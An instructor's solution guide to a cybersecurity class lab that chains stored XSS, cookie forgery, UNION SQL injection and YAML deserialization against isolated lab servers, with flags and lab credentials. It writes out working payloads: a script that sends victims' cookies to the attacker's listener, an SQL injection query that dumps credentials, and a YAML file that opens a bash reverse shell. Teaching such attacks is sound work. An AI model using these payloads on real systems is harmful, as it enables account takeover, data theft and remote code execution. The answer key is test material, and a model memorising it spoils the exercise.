

**Engineering – Management and Information Systems**

**Introduction to Cybersecurity**

## **Lab 2 – Solution Guide**

### **Web Application Vulnerabilities (SYNAPSE)**

**INSTRUCTOR ONLY — DO NOT DISTRIBUTE**

|                        |                                                          |
|------------------------|----------------------------------------------------------|
| <b>Flags</b>           | <b>3</b>                                                 |
| <b>Vulnerabilities</b> | <b>XSS, Broken Auth, SQLi, BAC, YAML Deserialization</b> |
| <b>OWASP</b>           | <b>A01, A03, A07, A08</b>                                |

## Prerequisites

- Parrot attacker node running with static IP 10.0.40.5/24
- Server-A SYNAPSE Portal running: http://192.168.30.10
- Server-B DataVault running: http://192.168.30.20

Configure Parrot static IP at session start:

```
nmcli con mod "Wired_connection_1" \
  ipv4.method manual ipv4.addresses 10.0.40.5/24 \
  ipv4.gateway 10.0.40.1 ipv4.dns 10.0.40.1
nmcli con up "Wired_connection_1"
```

## Phase 1 — Stored XSS + Cookie Theft

The /comments endpoint renders input without sanitisation ({ { c.body | safe } }). The victim bot visits /comments every ~20s as user guest. The session cookie has no HttpOnly flag.

### Step 1 — Start HTTP listener on Parrot

```
python3 -m http.server 8000
```

### Step 2 — Post XSS payload

Login as guest / guest123 and post to /comments:

```
<script>fetch('http://10.0.40.5:8000/?c='
  +encodeURIComponent(document.cookie))</script>
```

### Step 3 — Receive victim cookie

Within ~20s the listener logs:

```
GET /?c=session%3D1%3Aguest%3Aguest HTTP/1.1
```

Cookie format exposed: ID:ROLE:USERNAME — no cryptographic signature.

## Phase 2 — Broken Authentication (Cookie Forgery)

```
document.cookie = "session=1:admin:admin; path=/"
```

Refresh any page — header shows Logged in as: admin. Access to /portal and /search is now granted.

## Phase 3 — UNION SQL Injection (FLAG #1)

The /search?q= endpoint concatenates user input into a raw SQL query.

### Step 1 — Confirm injection

```
http://192.168.30.10/search?q='
```

Error displayed in browser confirms injection. The reports table has 5 columns.

### Step 2 — Dump admin\_users

```
/search?q=' UNION SELECT 1,username,flag,password,5 FROM  
admin_users--
```

Result:

```
monitor  
FLAG{synapse_sql_i_creds_dumped}
```

**FLAG #1:** FLAG{synapse\_sql\_i\_creds\_dumped}

## Phase 4 — Admin Panel (FLAG #2)

With the forged admin cookie, navigate to http://192.168.30.10/admin. The classified\_intel table entry contains:

```
FLAG{synapse_admin_classified_accessed}  
operator / D4t4V4ult#2024 [DataVault at 192.168.30.20]
```

**FLAG #2:** FLAG{synapse\_admin\_classified\_accessed}  
Server-B creds: operator / D4t4V4ult#2024

## Phase 5 — YAML Deserialization → RCE (FLAG #3)

Server-B DataVault uses `yaml.UnsafeLoader` in `/preview/<filename>`.

### Step 1 — Start listener on Parrot

```
nc -lvnp 4444
```

### Step 2 — Create YAML payload

```
cat > exploit.yml << 'EOF'
!!python/object/apply:os.system
- "bash_c_'bash_i_>&_/dev/tcp/10.0.40.5/4444_0>&1'"
EOF
```

### Step 3 — Upload and trigger

1. Login at `http://192.168.30.20` as `operator` / `D4t4V4ult#2024`
2. Upload `exploit.yml`
3. Click **Preview** — reverse shell connects to Parrot

### Step 4 — Read flag

```
cat /app/data/finalData.txt
# FLAG{synapse_nexus_exfil_complete}
```

**FLAG #3:** FLAG{synapse\_nexus\_exfil\_complete}

Note: reverse shell runs as `uid=0(root)` inside the Docker container.

## Summary

| Phase | Vulnerability                 | OWASP     | Flag    |
|-------|-------------------------------|-----------|---------|
| 1     | Stored XSS + cookie theft     | A03 / A07 | —       |
| 2     | Broken auth (unsigned cookie) | A07       | —       |
| 3     | UNION SQL Injection           | A03       | FLAG #1 |
| 4     | Broken access control (admin) | A01       | FLAG #2 |
| 5     | YAML deserialization + RCE    | A08       | FLAG #3 |

**Key learning points**

1. **Attack chaining** — no single vulnerability gives the final flag.
2. **Unsigned session tokens** — any cookie without HMAC/JWT can be forged.
3. **`yaml.Load()` without `SafeLoader`** — equivalent to `eval()`; always use `yaml.safe_load()`.
4. **Defence in depth** — each fixed vulnerability still leaves others exploitable.